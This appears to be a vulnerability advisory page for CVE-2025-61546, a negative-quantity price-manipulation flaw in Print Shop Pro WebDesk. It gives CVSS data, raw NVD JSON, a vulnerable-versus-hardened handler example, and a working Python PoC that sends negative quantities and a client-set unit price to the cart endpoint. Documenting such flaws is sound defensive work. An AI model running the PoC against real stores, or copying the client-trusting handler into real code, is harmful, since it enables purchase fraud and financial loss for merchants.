Security Vulnerability Report
CVE-2025-61546 CVSS 9.1 CRITICAL

CVE-2025-61546

Published: 2026-01-08 17:15:49
Last Modified: 2026-02-10 18:16:20

Description

There is an issue on the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69) that enables a remote attacker to create financial discrepancies by purchasing items with a negative quantity. This vulnerability is possible due to reliance on client-side input validation controls: the quantity is only checked in the browser, so a request sent directly to the endpoint (from a script or an intercepting proxy) bypasses the check and the server computes a price from the negative value. The NVD record classifies the weakness as CWE-20 (Improper Input Validation).
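The following is an added example, not code from the advisory, the disclosure, or the vendor's product: a minimal model of a cart price handler that trusts client-supplied values, beside a hardened version that validates on the server. The field names productId, quantity and unitPrice follow the page's PoC and are assumptions about the real request; the product catalog and the MAX_QUANTITY limit are constructed sample data.

```python
"""
Added example (not the vendor's code): a GetUnitPrice-style handler that
trusts the client, beside one that validates server-side.

Assumptions: request field names (productId, quantity, unitPrice) follow the
page's PoC; CATALOG and MAX_QUANTITY are constructed sample data.
"""
from decimal import Decimal, ROUND_HALF_UP
from typing import Any

# Constructed server-side catalog: product id -> unit price.
CATALOG = {
    "12345": Decimal("100.00"),
    "67890": Decimal("4.25"),
}

MAX_QUANTITY = 10_000  # assumed business limit; tune per deployment


class ValidationError(ValueError):
    """Raised by the hardened handler when a request is rejected."""


def get_unit_price_vulnerable(payload: dict[str, Any]) -> dict[str, Any]:
    """Model of the flawed behaviour: the server assumes the browser already
    validated the form and multiplies whatever it is given, including a
    negative quantity and a client-chosen unit price."""
    qty = payload["quantity"]
    unit_price = payload["unitPrice"]  # price is client-controlled too
    return {"UnitPrice": unit_price, "TotalPrice": qty * unit_price}


def get_unit_price_hardened(payload: dict[str, Any]) -> dict[str, Any]:
    """Server-side validation: quantity must be a positive integer within a
    limit, the unit price is looked up in the catalog (any client-supplied
    unitPrice is ignored), and the total is recomputed with exact decimals."""
    product_id = str(payload.get("productId", ""))
    if product_id not in CATALOG:
        raise ValidationError("unknown productId")

    qty = payload.get("quantity")
    # bool is a subclass of int, so reject it explicitly; also reject
    # strings such as "-5", floats such as 2.5, and anything non-numeric.
    if isinstance(qty, bool) or not isinstance(qty, int):
        raise ValidationError("quantity must be an integer")
    if qty < 1 or qty > MAX_QUANTITY:
        raise ValidationError(f"quantity must be between 1 and {MAX_QUANTITY}")

    unit_price = CATALOG[product_id]
    total = (unit_price * qty).quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
    return {"UnitPrice": str(unit_price), "TotalPrice": str(total)}


def rejects(payload: dict[str, Any]) -> bool:
    """True when the hardened handler refuses the request."""
    try:
        get_unit_price_hardened(payload)
    except ValidationError:
        return True
    return False


def demo() -> None:
    # The same request the page's PoC sends: negative quantity, fake price.
    attack = {"productId": "12345", "quantity": -999, "unitPrice": 100.00}
    print("vulnerable:", get_unit_price_vulnerable(attack))
    try:
        get_unit_price_hardened(attack)
    except ValidationError as exc:
        print("hardened rejected:", exc)
    # A legitimate order: the client's unitPrice of 0.01 is ignored.
    print("hardened ok:", get_unit_price_hardened(
        {"productId": "12345", "quantity": 3, "unitPrice": 0.01}))


if __name__ == "__main__":
    demo()
```

The hardened handler fixes two things the PoC relies on: the quantity is re-validated on the server regardless of what the form did, and the price is never taken from the request, which closes the related price-tampering path even when the quantity is valid.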

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Metric Source
Secondary (the only metric in the NVD record is a Secondary-source assessment; no Primary NVD score is present)
Weakness
CWE-20 (Improper Input Validation)

Note that the impact components (C:H/I:H) are the secondary source's assessment; the description itself only describes an integrity impact (financial discrepancies from negative quantities), so treat the confidentiality rating with caution when prioritising.

Configurations (Affected Products)

cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:* - VULNERABLE
Print Shop Pro WebDesk < 19.69 (fix version per the description; only 18.34 is confirmed by the CPE match)
Print Shop Pro WebDesk 18.34 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-61546 PoC - Print Shop Pro WebDesk Negative Quantity Bypass

This PoC demonstrates the business logic vulnerability in the GetUnitPrice
endpoint where negative quantity values can be used to create financial
discrepancies.
"""
import sys

import requests


def exploit_negative_quantity(target_url, product_id, negative_qty):
    """
    Exploit the negative quantity vulnerability in Print Shop Pro WebDesk.

    Args:
        target_url: Base URL of the vulnerable application
        product_id: ID of the product to purchase
        negative_qty: Negative quantity to send (e.g., -999)

    Returns:
        dict: Result of the check ("vulnerable", "total_price" or "error")
    """
    endpoint = f"{target_url}/PSP/appNET/Store/CartV12.aspx/GetUnitPrice"

    # Construct the malicious payload with a negative quantity.
    # Field names are the ones this PoC uses for the page-method request.
    payload = {
        "productId": product_id,
        "quantity": negative_qty,  # Negative value to exploit
        "unitPrice": 100.00        # Normal unit price
    }

    # ASP.NET page methods expect a JSON body and an XHR-style request.
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "X-Requested-With": "XMLHttpRequest"
    }

    print(f"[*] Target: {endpoint}")
    print(f"[*] Sending malicious request with quantity={negative_qty}")

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")

        if response.status_code == 200:
            # ASP.NET page methods wrap the return value in a "d" member.
            data = response.json()
            if 'd' in data:
                result = data['d']
                if isinstance(result, dict) and 'TotalPrice' in result:
                    total_price = float(result['TotalPrice'])
                    if total_price < 0:
                        print(f"[!] VULNERABLE: Negative price calculated: {total_price}")
                        print("[!] This can be used for financial fraud!")
                        return {"vulnerable": True, "total_price": total_price}
        return {"vulnerable": False}
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return {"error": str(e)}
    except (ValueError, TypeError) as e:
        # Body was not JSON, or TotalPrice was not numeric.
        print(f"[!] Unexpected response format: {e}")
        return {"error": str(e)}


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-61546_poc.py <target_url> <product_id>")
        print("Example: python cve-2025-61546_poc.py http://vulnerable-server.com 12345")
        sys.exit(1)

    target = sys.argv[1]
    product = sys.argv[2]

    # Test with a negative quantity value
    result = exploit_negative_quantity(target, product, -999)
    if result.get('vulnerable'):
        print("\n[+] Vulnerability confirmed!")
        print(f"[+] Attacker can create order with total price: {result['total_price']}")
```

References

https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61546 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61546", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.510", "lastModified": "2026-02-10T18:16:19.737", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an issue on the /PSP/appNET/Store/CartV12.aspx/GetUnitPrice endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69) that enables remote attacker to create financial discrepancies by purchasing items with a negative quantity. This vulnerability is possible due to reliance on client-side input validation controls."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61546", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}